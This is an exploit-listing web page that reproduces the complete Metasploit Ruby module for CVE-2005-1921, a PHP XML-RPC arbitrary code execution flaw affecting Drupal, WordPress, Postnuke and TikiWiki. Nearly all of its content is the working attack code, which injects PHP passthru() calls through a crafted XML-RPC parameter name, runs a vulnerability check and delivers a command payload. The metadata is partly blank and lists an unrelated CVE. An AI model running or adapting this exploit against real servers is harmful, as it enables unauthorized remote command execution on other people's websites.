Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
PHP XML-RPC Arbitrary Code Execution - exploit.company
header-logo
Suggest Exploit
vendor:
by:
hdm, cazz
N/A
CVSS
N/A
Arbitrary Code Execution
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE: CVE-2005-1921
CPE:
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2005-2498/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-e65ad1bf-0d8b-11da-90d0-00304823c0d3/https://www.rapid7.com/db/vulnerabilities/suse-cve-2005-2498/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2005-1921/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-523fad14-eb9d-11d9-a8bd-000cf18bbe54/https://www.rapid7.com/db/vulnerabilities/suse-cve-2005-1921/
Other Scripts:
Platforms Tested: unix, solaris
2005

PHP XML-RPC Arbitrary Code Execution

This module exploits an arbitrary code execution flaw discovered in many implementations of the PHP XML-RPC module. This flaw is exploitable through a number of PHP web applications, including but not limited to Drupal, Wordpress, Postnuke, and TikiWiki.

Mitigation:

Source

Exploit-DB raw data:

##
# $Id: php_xmlrpc_eval.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	# XXX This module needs an overhaul
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PHP XML-RPC Arbitrary Code Execution',
			'Description'    => %q{
					This module exploits an arbitrary code execution flaw
				discovered in many implementations of the PHP XML-RPC module.
				This flaw is exploitable through a number of PHP web
				applications, including but not limited to Drupal, Wordpress,
				Postnuke, and TikiWiki.
			},
			'Author'         => [ 'hdm', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					['CVE', '2005-1921'],
					['OSVDB', '17793'],
					['BID', '14088'],
				],
			'Privileged'     => false,
			'Platform'       => ['unix', 'solaris'],
			'Payload'        => {
					'Space' => 512,
					'DisableNops' => true,
					'Keys'  => ['cmd', 'cmd_bash'],
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Jun 29 2005'
			))


		register_options(
			[
				OptString.new('PATH', [ true,  "Path to xmlrpc.php", '/xmlrpc.php']),
			], self.class)

		deregister_options(
			'HTTP::junk_params', # not your typical POST, so don't inject params.
			'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
			)
	end

	def go(command)

		encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
		wrapper = rand_text_alphanumeric(rand(128)+32)

		cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"

		xml =
		'<?xml version="1.0"?>' +
		"<methodCall>" +
			"<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
			"<params><param>" +
				"<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
				"<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" +
			"</param></params>" +
		"</methodCall>";

		res = send_request_cgi({
				'uri'          => datastore['PATH'],
				'method'       => 'POST',
				'ctype'        => 'application/xml',
				'data'         => xml,
			}, 5)

		if (res and res.body)
			b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
			if b
				return b.captures[0]
			elsif datastore['HTTP::chunked'] == true
				b = /chunked Transfer-Encoding forbidden/.match(res.body)
				if b
					raise RuntimeError, 'Target PHP installation does not support chunked encoding.  Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
				end
			end
		end

		return nil
	end

	def check
		response = go("echo ownable")
		if (!response.nil? and response =~ /ownable/sm)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		response = go(payload.encoded)
		if response == nil
			print_error('exploit failed: no response')
		else
			if response.length == 0
				print_status('exploit successful')
			else
				print_status("Command returned #{response}")
			end
			handler
		end
	end
end

Navigation

Suggest Exploit

Services By CQR